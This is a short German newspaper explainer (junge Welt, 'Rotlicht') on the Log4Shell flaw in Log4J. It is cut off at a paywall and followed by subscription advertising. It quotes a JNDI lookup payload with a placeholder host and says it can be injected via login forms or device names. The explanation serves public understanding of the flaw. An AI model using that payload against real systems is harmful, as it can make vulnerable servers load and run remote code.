Rotlicht: Log4Shell
Matthias ClausenSoftwareprobleme schaffen es nur selten in die Schlagzeilen. Beim jüngsten Fall »Log4Shell« ist das anders, handelt es sich doch um einen Fehler, der dafür sorgt, dass mit einem ziemlich einfachen Angriff auf die Systeme der größten Webanwendungen beliebige Befehle ausgeführt werden können. Wie funktioniert das? Wie alle Texte kann man auch Programme in verschiedenen Sprachen verfassen. Eine dieser Sprachen ist Java. Damit ein Javaprogramm Logdateien produziert, wird dafür meist die Komponente »Log4J« verwendet. Diese sorgt nun für den Fehler, wenn es einen Eintrag mit einem Text wie »${jndi:ldap://beispiel.de}« protokollieren soll. Das kann man z. B. über ein Loginformular provozieren, denn fehlgeschlagene Anmeldeversuche werden häufig aufgezeichnet. Bei Apple hat es sogar gereicht, die Gerätebezeichnung in den I-Phone-Einstellungen entsprechend zu ändern. Das Javaprogramm führt dann alle Befehle aus, die es von der angegebenen Internetadresse herunterl...
Artikel-Länge: 3787 Zeichen
Dieser Beitrag ist gesperrt und nur für Onlineabonnenten lesbar. Die Tageszeitung junge Welt finanziert sich vor allem aus den Aboeinnahmen. Mit einem Onlineabo tragen Sie dazu bei, das Erscheinen der jungen Welt und ihre Unabhängigkeit zu sichern.
Für Unentschlossene gibt es die Tageszeitung junge Welt auch am Kiosk, für 1,90 € wochentags und 2,30 € am Wochenende. Alle belieferten Verkaufsstellen in Ihrer Nähe finden Sie hier.
Vollen Zugriff auf alle Artikel bietet das Onlineabo. Jetzt bestellen unter www.jungewelt.de/abo.
Unverzichtbar! Jetzt junge Welt stärken.
Hilfe bei Einlog-ProblemenAbo abschließen
Gedruckt
Sechs mal die Woche: Hintergrund und Analysen, Kultur, Wissenschaft und Politik. Und Samstag acht Seiten extra.
Verschenken
Anderen eine Freude machen: Verschenken Sie jetzt ein Abonnement der Printausgabe.